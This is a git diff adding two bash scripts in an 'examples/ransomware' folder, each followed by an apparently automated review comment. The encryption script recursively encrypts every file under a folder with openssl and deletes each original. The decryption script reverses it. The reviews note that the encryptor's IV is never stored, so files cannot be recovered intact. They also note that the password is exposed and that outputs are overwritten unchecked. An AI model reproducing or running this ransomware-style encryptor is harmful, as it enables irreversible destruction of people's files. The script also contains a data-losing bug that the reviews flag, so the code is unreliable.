diff --git a/examples/ransomware/decrypt_files_recursive.sh b/examples/ransomware/decrypt_files_recursive.sh
new file mode 100755
index 0000000..375da4e
--- /dev/null
+++ b/examples/ransomware/decrypt_files_recursive.sh
@@ -0,0 +1,43 @@
+#!/bin/bash
+
+# Check if the correct number of arguments is provided
+if [ "$#" -ne 3 ]; then
+ echo "Usage: $0 "
+ exit 1
+fi
+
+folder="$1"
+password="$2"
+extension="$3"
+
+# Ensure the directory exists
+if [ ! -d "$folder" ]; then
+ echo "Directory $folder does not exist."
+ exit 1
+fi
+
+# Find all files with the specified encrypted extension in the directory and subdirectories
+find "$folder" -type f -name "*.$extension" | while read -r file; do
+ # Skip if the file does not exist or is unreadable
+ if [ ! -r "$file" ]; then
+ echo "Skipping unreadable file: $file"
+ continue
+ fi
+
+ # Extract the original filename by removing the .encrypted extension
+ dirpath=$(dirname "$file")
+ filename=$(basename "$file" ".$extension")
+ original_file="$dirpath/$filename"
+
+ # Decrypt the file
+ echo "Decrypting $file to $original_file"
+ if openssl enc -d -aes-256-cbc -in "$file" -out "$original_file" -k "$password" -pbkdf2; then
+ # If decryption is successful, remove the encrypted file
+ rm "$file"
+ echo "Decrypted and removed $file."
+ else
+ # If decryption fails, print an error message
+ echo "Failed to decrypt $file."
+ fi
+done
+
diff --git a/examples/ransomware/encrypt_files_recursive.sh b/examples/ransomware/encrypt_files_recursive.sh
new file mode 100755
index 0000000..7f86688
--- /dev/null
+++ b/examples/ransomware/encrypt_files_recursive.sh
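Review bot: In decrypt_files_recursive.sh the `rm "$file"` after the openssl call treats a zero exit status as proof of a correct decryption, but `-aes-256-cbc` carries no authentication, so a wrong password or damaged ciphertext can occasionally pass the padding check and leave garbage in `$original_file` while the only ciphertext is deleted. The `-out "$original_file"` also overwrites any existing file of that name without checking. I would keep the encrypted file until the output has been verified, and guard the write with `[ -e "$original_file" ] && { echo "Refusing to overwrite $original_file"; continue; }`. Separately, `-k "$password"` puts the password on the openssl command line, where it is visible in the process list; `-pass env:VARNAME` (VARNAME being a placeholder) avoids that.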
@@ -0,0 +1,55 @@
+#!/bin/bash
+
+# Check if the correct number of arguments is provided
+if [ "$#" -ne 3 ]; then
+ echo "Usage: $0 "
+ exit 1
+fi
+
+folder="$1"
+password="$2"
+extension="$3"
+
+# Ensure the directory exists
+if [ ! -d "$folder" ]; then
+ echo "Directory $folder does not exist."
+ exit 1
+fi
+
+# Generate a unique initialization vector (IV) for each file
+generate_iv() {
+ openssl rand -hex 16
+}
+
+# Find all files in the directory and subdirectories
+find "$folder" -type f | while read -r file; do
+ # Skip if the file does not exist or is unreadable
+ if [ ! -r "$file" ]; then
+ echo "Skipping unreadable file: $file"
+ continue
+ fi
+
+ # Extract filename and extension
+ filename=$(basename "$file")
+ dirpath=$(dirname "$file")
+ base_name="${filename%.*}"
+ ext="${filename##*.}"
+
+ # Define the output file path by appending .encrypted to the original extension
+ output_file="$dirpath/${base_name}.${ext}.${extension}"
+
+ # Generate a unique IV
+ iv=$(generate_iv)
+
+ # Encrypt the file
+ echo "Encrypting $file to $output_file with IV $iv"
+ if openssl enc -aes-256-cbc -salt -in "$file" -out "$output_file" -k "$password" -iv "$iv" -pbkdf2; then
+ # If encryption is successful, remove the original file
+ rm "$file"
+ echo "Encrypted and removed $file."
+ else
+ # If encryption fails, print an error message
+ echo "Failed to encrypt $file."
+ fi
+done
+
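Review bot: The `-iv "$iv"` given to `openssl enc` is only echoed to the terminal and never stored, and decrypt_files_recursive.sh in this commit passes no `-iv`, so as far as I can tell the two scripts do not round-trip: the first 16-byte block of each file comes back corrupted, and `rm "$file"` has already deleted the only intact copy. With `-salt` and `-pbkdf2`, openssl already derives a per-file IV from the password and the random salt it writes into the output header. Dropping `-iv "$iv"` and `generate_iv` would therefore let the decryptor reproduce the IV from the file itself. Until the pair is shown to round-trip on sample data, the `rm "$file"` step should not run unconditionally.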